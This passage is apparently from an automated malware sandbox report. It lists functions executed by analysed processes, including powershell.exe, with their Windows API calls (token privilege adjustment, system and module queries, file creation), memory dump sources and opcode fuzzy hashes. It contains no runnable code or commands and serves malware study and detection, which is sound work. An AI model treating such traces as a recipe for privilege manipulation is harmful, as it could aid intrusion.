                                                        • Opcode Fuzzy Hash: 8d9eb0ca1ffea62a1430733a5b648e3a5dd3fdd48d6f602dd94b68f9d013d1df
                                                        • Instruction Fuzzy Hash: CE11677590020D9FCB10CFA9C844BEFFBF9AF48314F10881AE619A7250CBB5A950CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002F5590, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: f1cd4814b3bec569e37c802083eb618637891d448f7c6aba156f0637d02db2ce
                                                        • Instruction ID: ae09e84da795f54268ebb1ec98226fbc685ae85c70307fb5f1535c5269452f9e
                                                        • Opcode Fuzzy Hash: f1cd4814b3bec569e37c802083eb618637891d448f7c6aba156f0637d02db2ce
                                                        • Instruction Fuzzy Hash: 0C1158B5D006198FCB10CFA9D8447EEFBF5AF88318F24882AD519A7250D778A940CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002F5598, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 416e17873d62a67bf4559fec8be60355e7367ecc9d492154e0374512b7578e0c
                                                        • Instruction ID: 7e3fe095e7550c3c555ee43e8ff3c90a93a79724b2c73716e7fefdd0555017f5
                                                        • Opcode Fuzzy Hash: 416e17873d62a67bf4559fec8be60355e7367ecc9d492154e0374512b7578e0c
                                                        • Instruction Fuzzy Hash: C7113AB5D006198FDB10CFA9D8447EEFBF9AF88314F14882AD519A7240DB74A940CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0011D01C, Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164835862.000000000011D000.00000040.00000001.sdmp, Offset: 0011D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e54f84cd645f85d30a4ea8a8ee74c83a38d8fe53e68b0a130e7477fe0fb2016
                                                        • Instruction ID: 8ad29f9060c75dc4d56b0ce83e6af11995e69cebab083d47218575ce4d456c3b
                                                        • Opcode Fuzzy Hash: 9e54f84cd645f85d30a4ea8a8ee74c83a38d8fe53e68b0a130e7477fe0fb2016
                                                        • Instruction Fuzzy Hash: 0321F875604204DFCB18CF14E884B66BB65EB88314F20C5BDE80A4B346C336D897C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0011D017, Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164835862.000000000011D000.00000040.00000001.sdmp, Offset: 0011D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 946f52d015dba9bf56d0e9c0be5d249f1ec5587dd5124915a46d44fb8664578e
                                                        • Instruction ID: 77677c99e95cbee1edaeadc9e46d5399dd76fff2f764794e321aa06743462324
                                                        • Opcode Fuzzy Hash: 946f52d015dba9bf56d0e9c0be5d249f1ec5587dd5124915a46d44fb8664578e
                                                        • Instruction Fuzzy Hash: D9118E75504284DFCB15CF14E584B56BB61FB48314F24C6A9E8494B656C33AD84ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 1664 Parent PID: 2692 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01B9ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01B9AD37
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: d5f6c4b14daa737c81b753ded18ea1dc09e34481b253fe30c33ccbc364c15b58
                                                        • Instruction ID: f9dc7761e458cf606adfc2d5eda59ecff2fdcad5ecce4ba462bd35a972115ce9
                                                        • Opcode Fuzzy Hash: d5f6c4b14daa737c81b753ded18ea1dc09e34481b253fe30c33ccbc364c15b58
                                                        • Instruction Fuzzy Hash: 61219F765097849FEB238F25DC44B92BFF4EF06210F0884EAE9858B563D371A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01B9AD37
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 2836dd3ecb24bba93632b648bcffd0babe7860727c7eedda890ab7a53c6b1b51
                                                        • Instruction ID: f8fa2a75b517cad0cee1827b8062ba7b531e71a43aea1d97d280a3c5c1bce4d5
                                                        • Opcode Fuzzy Hash: 2836dd3ecb24bba93632b648bcffd0babe7860727c7eedda890ab7a53c6b1b51
                                                        • Instruction Fuzzy Hash: FB117C76500704DFEF25CF65D884BA6FBE4EF04221F08C5AAED4A8B662D731E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01B9B329
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: ca2e2b84dbe2ce09e5bb7f9de31d2550b10292cc917596a931f6e9578cd8e47b
                                                        • Instruction ID: e48ba10dda33acb091e86993099d4f7dd49144470f703a39dec0c6f3d41edbb0
                                                        • Opcode Fuzzy Hash: ca2e2b84dbe2ce09e5bb7f9de31d2550b10292cc917596a931f6e9578cd8e47b
                                                        • Instruction Fuzzy Hash: ED119E71508384AFDB228F15DC45F52FFB4EF06220F09849AED894B663C275A818DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01B9B329
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 7a69219c8fd9c6d3413db958f8f1a5ed692455ab32709d939c8829bdc6c06b88
                                                        • Instruction ID: 21fb0ed4a2fd300041aff81701ecc848dba4b9c4e76776ce1ccddaae92fd6dfb
                                                        • Opcode Fuzzy Hash: 7a69219c8fd9c6d3413db958f8f1a5ed692455ab32709d939c8829bdc6c06b88
                                                        • Instruction Fuzzy Hash: EE01AD32504704DFEF21CF09E985F61FBA0EF04720F08C1AADD490B612C371A419DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: a3599378da17c332e08e8533c4f04534b96a07024cb4b1b6518dbc3f2f312dac
                                                        • Instruction ID: bab426b1e461531b6f169ecaf62648fced28454f53d4b95a7e2f9f5a4f411674
                                                        • Opcode Fuzzy Hash: a3599378da17c332e08e8533c4f04534b96a07024cb4b1b6518dbc3f2f312dac
                                                        • Instruction Fuzzy Hash: 33314A7650E3C08FEB138B759C65692BFB4AF03210F0E84DBD884CF1A3D6259809D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 58222893e0cda127b42e90ed1ab64b13cc6b8b37d77e422523234d9b0de4acc7
                                                        • Instruction ID: 5617fe42638f12551a4badbefc29c62dc606bae2ef01c60f7a7440e3880a298a
                                                        • Opcode Fuzzy Hash: 58222893e0cda127b42e90ed1ab64b13cc6b8b37d77e422523234d9b0de4acc7
                                                        • Instruction Fuzzy Hash: 04316571505340AFE721CF65CC45F56BFF8EF05210F09849EE9859B292D375E908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 89353be640d2b630e4a491afdeb1f7e049ba7d96c03df1989442955b36e00267
                                                        • Instruction ID: e9ab8dc7209c218ae9d29d29191a0a6fc68692072a022790a259bb7415ae88e0
                                                        • Opcode Fuzzy Hash: 89353be640d2b630e4a491afdeb1f7e049ba7d96c03df1989442955b36e00267
                                                        • Instruction Fuzzy Hash: EA319871509380AFE712CB25DC45F96BFE8DF06214F0884AAE944DF293D375A905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: ca695937d4605e5a93631e581391def1704252a68f9eade58b26f09828529f3a
                                                        • Instruction ID: 27f1c13a4fddd8615b492e823be17e4dc121361158670d5d2d1bae4bb2d28e86
                                                        • Opcode Fuzzy Hash: ca695937d4605e5a93631e581391def1704252a68f9eade58b26f09828529f3a
                                                        • Instruction Fuzzy Hash: 0021A7B2509380AFEB128B24DC45F96BFB8EF06310F0885DBE985DB193D2659945C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 7b295c62329e871154e87ae29e12ef01ced9cc0aa0285cab76c0ce49f2916504
                                                        • Instruction ID: 94a24a08b50216554fdc03c2a77927b9ac1c28b1884613776fbe4334edf4d502
                                                        • Opcode Fuzzy Hash: 7b295c62329e871154e87ae29e12ef01ced9cc0aa0285cab76c0ce49f2916504
                                                        • Instruction Fuzzy Hash: FA31C572009384AFEB12CB60DC45F96BFB8EF06210F0884DBF985DB193D224A909C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 163e386d7a06dfadb51ac1e1aaffdf37fa1144ba138091c4fab056b83c330b9b
                                                        • Instruction ID: 7b758e063845b49e49702b20078f90fc85a44de6f33c37e73ac851d1182283af
                                                        • Opcode Fuzzy Hash: 163e386d7a06dfadb51ac1e1aaffdf37fa1144ba138091c4fab056b83c330b9b
                                                        • Instruction Fuzzy Hash: CE315E7550E3C06FD3138B258C55B66BFB4AF43610F1A81DBD8848F6A3D629A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 33bcea36f551d35d210e99edc2c0637714024fa4202f8f7b28f641f7c8d36821
                                                        • Instruction ID: e55d4366536ac03e8cb6d31561ef052450a57416581c200bfe1933904cfc80ec
                                                        • Opcode Fuzzy Hash: 33bcea36f551d35d210e99edc2c0637714024fa4202f8f7b28f641f7c8d36821
                                                        • Instruction Fuzzy Hash: D4219171509384AFEB22CB15DC45FA6BFA8EF06220F0884ABE945DB152D764A909CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9A1A8, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01B9A23E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: dd03e84c3e234061c56c4a803c152b9adc15c8a4bdbafd5df16c5884b64c6595
                                                        • Instruction ID: 295982da228b05529dd9eae5cb85a98de1eb5c8388e96536a45e9dd13f3d0446
                                                        • Opcode Fuzzy Hash: dd03e84c3e234061c56c4a803c152b9adc15c8a4bdbafd5df16c5884b64c6595
                                                        • Instruction Fuzzy Hash: 2C21C47150D3C16FD3128B258C55B66BFB4EF47620F1981DBE888CF293D329A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 0e82de1100ad3481495405dddd2573d2a895db3c97eaf5399afec219646cdcef
                                                        • Instruction ID: e54c9af631b826a706423b1110ca3d58a74e8142816db832eaeacd8b37c2798d
                                                        • Opcode Fuzzy Hash: 0e82de1100ad3481495405dddd2573d2a895db3c97eaf5399afec219646cdcef
                                                        • Instruction Fuzzy Hash: 6C21DAB6408784AFE712CB159C45FA3BFA8EF46720F0981DBF9859B193D224A905C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 303b2784f1fb5322dfcc76a07723800e4660307d7df576634179f72eca44215e
                                                        • Instruction ID: 2294ed89cf352b79cab386e0b8ba1723b2efb3f54fe5e674aec0b6e3206d76dc
                                                        • Opcode Fuzzy Hash: 303b2784f1fb5322dfcc76a07723800e4660307d7df576634179f72eca44215e
                                                        • Instruction Fuzzy Hash: D6217F7640E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027706AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 308d93b7db35d9db75ce005c8cc6d154c3513f54c424605a2fa1b85e09720fc9
                                                        • Instruction ID: 4df03554cadd9475397f74d638adccb241f85bef4ff257b475ee7ff1fe83db61
                                                        • Opcode Fuzzy Hash: 308d93b7db35d9db75ce005c8cc6d154c3513f54c424605a2fa1b85e09720fc9
                                                        • Instruction Fuzzy Hash: 65219071500704EFEB21DF65CC85F66FBE8EF08650F04846AE9499B691D771E904CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 91a8b2338f2881770661913331ff59bb094f8669be8cd4e880e898068ac74f75
                                                        • Instruction ID: e117277d94ea70465b34ffc5b96d9e213fe183239d7422f2a0c790d75d3bdfef
                                                        • Opcode Fuzzy Hash: 91a8b2338f2881770661913331ff59bb094f8669be8cd4e880e898068ac74f75
                                                        • Instruction Fuzzy Hash: 75219272409380AFE722CF61DC45F96BFB8EF06314F0984DBE9449B153C265A909CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01B9A94A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 5a557f02e34a6fcbdfa8bd8ee69c4e6501a6d5645cd68def3ce371b42e50643a
                                                        • Instruction ID: 191cdcaf13bc9cbb5a5b8198abfadb0f2862ce079e53a95316ed8e164f12a727
                                                        • Opcode Fuzzy Hash: 5a557f02e34a6fcbdfa8bd8ee69c4e6501a6d5645cd68def3ce371b42e50643a
                                                        • Instruction Fuzzy Hash: 8621A77540D780AFD3138B25DC51B62BFB4EF87710F0981DBE8848B653D224A919C7B6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 7b99018c4a92291104ebaf6bbda4e63994cdf323786e49cf5bf17a3fb9db098b
                                                        • Instruction ID: 4f9b23e89f62e4847a62e3f90b7e359f4f23d0c8b10a9194de1bd3966ac3cfb9
                                                        • Opcode Fuzzy Hash: 7b99018c4a92291104ebaf6bbda4e63994cdf323786e49cf5bf17a3fb9db098b
                                                        • Instruction Fuzzy Hash: 4621AE71600300AFFB20DF25CC85BA6FBD8EF04210F0884AAE848DB282D775F904CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 5fbd5fac24e521aa8ca4215c002550c04061c347c32c5aa9a3591718aa52678b
                                                        • Instruction ID: 8d090e58c9aca3b457a9f4fb71c94166b280cea94d7dd3e0abb47d5ac16748bd
                                                        • Opcode Fuzzy Hash: 5fbd5fac24e521aa8ca4215c002550c04061c347c32c5aa9a3591718aa52678b
                                                        • Instruction Fuzzy Hash: 1311AF72500704EFEB21CF65DD85FAAFBECEF05320F0489AAF949DA541D670A9058BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: f3382e2422e1ce549a442b3eb3abe4d7d726569573f2b82dacc59dafe7201ff0
                                                        • Instruction ID: 43aca8b2a7648734ea0b5768a413d838dec0fe8916fb588c78a9d037a0f2822c
                                                        • Opcode Fuzzy Hash: f3382e2422e1ce549a442b3eb3abe4d7d726569573f2b82dacc59dafe7201ff0
                                                        • Instruction Fuzzy Hash: 37117F71600304EFEB21CF15DD85FA6BBE8EF04660F1485AAE909DB641D774E9058A61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 75e394b0de1fea183afdaa3d1563b5e502a6b91459febc7af655da1091388fc4
                                                        • Instruction ID: e9b6a36890e5e6e71013dd27aa872b7a01c681366b04bbf5322615f1aae7568b
                                                        • Opcode Fuzzy Hash: 75e394b0de1fea183afdaa3d1563b5e502a6b91459febc7af655da1091388fc4
                                                        • Instruction Fuzzy Hash: CB218E725083809FEB218F25DC45B96BFF4EF06220F0884AAED898B562D235A448DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 3bdf9229bebc46d21a1f45c77ba086fc36645d0b66dbfc2db797e1f03643b7a1
                                                        • Instruction ID: 450e3d86058d9516b3c7d052cbde57e245f7b8d9c47bf8251e0f287ce0853fa2
                                                        • Opcode Fuzzy Hash: 3bdf9229bebc46d21a1f45c77ba086fc36645d0b66dbfc2db797e1f03643b7a1
                                                        • Instruction Fuzzy Hash: 1B21497150D3C09FDB128B25DC55B92BFA4AF03224F0D84DAE8888F693D265A808CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: 1bf72f8ed65b5ac01091647eda0664bee0f5086d96fcdb4d1528a05ba6c99422
                                                        • Instruction ID: 90fd0bc8f09f3c51a576f87f43394ffeb297231124a34a29f6a64786ca03bf8d
                                                        • Opcode Fuzzy Hash: 1bf72f8ed65b5ac01091647eda0664bee0f5086d96fcdb4d1528a05ba6c99422
                                                        • Instruction Fuzzy Hash: 912192725093C09FDB128B25DC55A92BFE4EF07320F0D84EBDD858F163D224A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01B9AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: c6a8b273563e70517afaca1840de06e68d578cd4dd266364299e7794317bb8fd
                                                        • Instruction ID: dcf96a33d8678c992d892731f8febfd2cfe97886e00174ffdaae0160d468a851
                                                        • Opcode Fuzzy Hash: c6a8b273563e70517afaca1840de06e68d578cd4dd266364299e7794317bb8fd
                                                        • Instruction Fuzzy Hash: 3D2142716053809FEB22CF29DC45B52BFE8EF46610F0884EAED49DB652D375E404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027710D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 3bab07ecf2585e0be811423274551b430280124481fa7c28d0f9d74e3dde912c
                                                        • Instruction ID: f283249a454f65cc6741e07ece0c098b283a8a064b27021846802d42e6381575
                                                        • Opcode Fuzzy Hash: 3bab07ecf2585e0be811423274551b430280124481fa7c28d0f9d74e3dde912c
                                                        • Instruction Fuzzy Hash: 1B216D6140D3C49FD7138B25DC54A62BFB4EF57620F0D80DBD8898F2A3D2696808D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 1334c81d895e416706b0cfbd6d73970cf326fbe0648da016e28cb08b43ddd249
